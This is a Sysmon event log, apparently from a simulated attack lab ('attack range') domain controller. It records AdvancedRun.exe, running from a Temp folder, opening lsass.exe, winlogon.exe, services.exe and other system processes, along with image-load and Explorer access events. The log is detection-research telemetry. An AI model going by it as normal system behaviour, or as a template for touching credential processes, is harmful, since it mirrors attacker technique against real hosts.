run\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004077837Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.040{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077836Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.040{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077835Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.039{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077834Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.039{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077833Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.039{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077832Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.039{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077831Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.039{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077830Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:35.038{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000004077829Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.038{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft 
WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004077828Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.037{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077817Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:32.913{834264DD-DB11-61EA-9500-000000002702}4283620C:\Windows\Explorer.EXE{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077816Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:32.913{834264DD-DB11-61EA-9500-000000002702}4285200C:\Windows\Explorer.EXE{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077815Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:32.913{834264DD-DB11-61EA-9500-000000002702}4283620C:\Windows\Explorer.EXE{834264DD-14A0-61EB-9208-000000002702}6016C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator

Sysmon events from Microsoft-Windows-Sysmon/Operational on win-dc-mhaag-attack-range-139.attackrange.local, newest first. System fields shared by every record: Version=3, Level=4, Task=EventID, Opcode=0, Keywords=0x8000000000000000, RuleName=-. EventID 7 is Image loaded; EventID 10 is Process accessed. The export ran SourceProcessId and SourceThreadId together with no delimiter, so they are shown as one number.

EventRecordID=4077814  EventID=10 (Process accessed)  UtcTime=2022-01-21 20:16:32.913
  SourceProcessGUID={834264DD-DB11-61EA-9500-000000002702}  SourceProcessId+SourceThreadId=4283620  SourceImage=C:\Windows\Explorer.EXE
  TargetProcessGUID={834264DD-14A0-61EB-9208-000000002702}  TargetProcessId=6016  TargetImage=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  GrantedAccess=0x1000
  CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
  SourceUser=ATTACKRANGE\Administrator  TargetUser=ATTACKRANGE\Administrator

EventRecordID=4077813  EventID=10 (Process accessed)  UtcTime=2022-01-21 20:16:32.912
  SourceProcessGUID={834264DD-DB11-61EA-9500-000000002702}  SourceProcessId+SourceThreadId=4285200  SourceImage=C:\Windows\Explorer.EXE
  TargetProcessGUID={834264DD-14A0-61EB-9208-000000002702}  TargetProcessId=6016  TargetImage=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  GrantedAccess=0x1000
  CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
  SourceUser=ATTACKRANGE\Administrator  TargetUser=ATTACKRANGE\Administrator

EventRecordID=4077812  EventID=10 (Process accessed)  UtcTime=2022-01-21 20:16:32.912
  SourceProcessGUID={834264DD-DB11-61EA-9500-000000002702}  SourceProcessId+SourceThreadId=4285200  SourceImage=C:\Windows\Explorer.EXE
  TargetProcessGUID={834264DD-14A0-61EB-9208-000000002702}  TargetProcessId=6016  TargetImage=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  GrantedAccess=0x1000
  CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
  SourceUser=ATTACKRANGE\Administrator  TargetUser=ATTACKRANGE\Administrator

EventRecordID=4077809  EventID=10 (Process accessed)  UtcTime=2022-01-21 20:16:32.911
  SourceProcessGUID={834264DD-DB11-61EA-9500-000000002702}  SourceProcessId+SourceThreadId=4285200  SourceImage=C:\Windows\Explorer.EXE
  TargetProcessGUID={834264DD-14A0-61EB-9208-000000002702}  TargetProcessId=6016  TargetImage=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  GrantedAccess=0x1000
  CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
  SourceUser=ATTACKRANGE\Administrator  TargetUser=ATTACKRANGE\Administrator

EventRecordID=4077808  EventID=10 (Process accessed)  UtcTime=2022-01-21 20:16:32.906
  SourceProcessGUID={834264DD-DB10-61EA-9000-000000002702}  SourceProcessId+SourceThreadId=33365092  SourceImage=C:\Windows\System32\taskhostw.exe
  TargetProcessGUID={834264DD-14A0-61EB-9208-000000002702}  TargetProcessId=6016  TargetImage=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  GrantedAccess=0x1000
  CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
  SourceUser=ATTACKRANGE\Administrator  TargetUser=ATTACKRANGE\Administrator

EventRecordID=4077807  EventID=10 (Process accessed)  UtcTime=2022-01-21 20:16:32.906
  SourceProcessGUID={834264DD-DB10-61EA-9000-000000002702}  SourceProcessId+SourceThreadId=33365092  SourceImage=C:\Windows\System32\taskhostw.exe
  TargetProcessGUID={834264DD-14A0-61EB-9208-000000002702}  TargetProcessId=6016  TargetImage=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  GrantedAccess=0x1000
